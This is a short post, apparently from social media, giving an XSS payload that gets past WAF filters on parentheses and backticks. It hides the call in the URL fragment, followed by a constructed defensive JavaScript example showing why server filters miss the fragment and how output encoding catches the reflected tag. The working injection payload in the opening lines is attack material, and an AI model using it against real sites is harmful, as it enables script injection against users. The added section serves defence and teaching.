Bypassing Complete Parenthesis/Backticks Restrictions in #XSS Payloads with Hiding
#WAF #bypass
1. Inject:
<Svg Id=JavaScrip
OnLoad=location=id+'t:/*'+URL>
2. Place in the end of URL:
#*/confirm(1)
(Everything after # never gets sent to server)
PoC: https://t.co/zxuheCOtZp
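
A defender's view of why the fragment never reaches a server-side filter, and what still catches the reflected markup. This is an added example, not part of the original post. The host `app.example`, the `q` parameter and all function names are hypothetical.

```javascript
// Constructed sample: the reflected value from step 1, and a visited URL
// ending in the step-2 fragment.
const reflected = "<Svg Id=JavaScrip OnLoad=location=id+'t:/*'+URL>";
const visited = "https://app.example/search?q=" +
  encodeURIComponent(reflected) + "#*/confirm(1)";

// What a client puts on the HTTP request line: path and query, never the fragment.
function requestTarget(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// The parameter value as a server or WAF decodes it from the request line.
function serverSeenParam(url, name) {
  return new URL("http://placeholder" + requestTarget(url)).searchParams.get(name);
}

// The restriction the post talks about: reject parentheses and backticks.
function blocksCallSyntax(value) {
  return /[()`]/.test(value);
}

// Structural check that does not depend on call syntax:
// any tag that carries an inline on* event-handler attribute.
function hasInlineHandler(value) {
  return /<[a-z][^>]*\s+on[a-z]+\s*=/i.test(value);
}

// Output encoding for an HTML context: the reflected value can no longer
// open a tag, so no handler is ever attached.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`=\/]/g, c => "&#" + c.charCodeAt(0) + ";");
}

// Summary of what each control sees for a given URL and parameter.
function inspect(url, name) {
  const seen = serverSeenParam(url, name);
  return {
    fragmentOnWire: requestTarget(url).includes("confirm"),
    callSyntaxFilterBlocks: blocksCallSyntax(seen),
    handlerCheckBlocks: hasInlineHandler(seen),
    encodedOutput: escapeHtml(seen),
  };
}

console.log(inspect(visited, "q"));
```

Because the fragment is visible only in the browser, the server-side controls that work here are the ones applied to the reflected value itself: encoding on output, or rejecting inline event handlers regardless of what characters they contain.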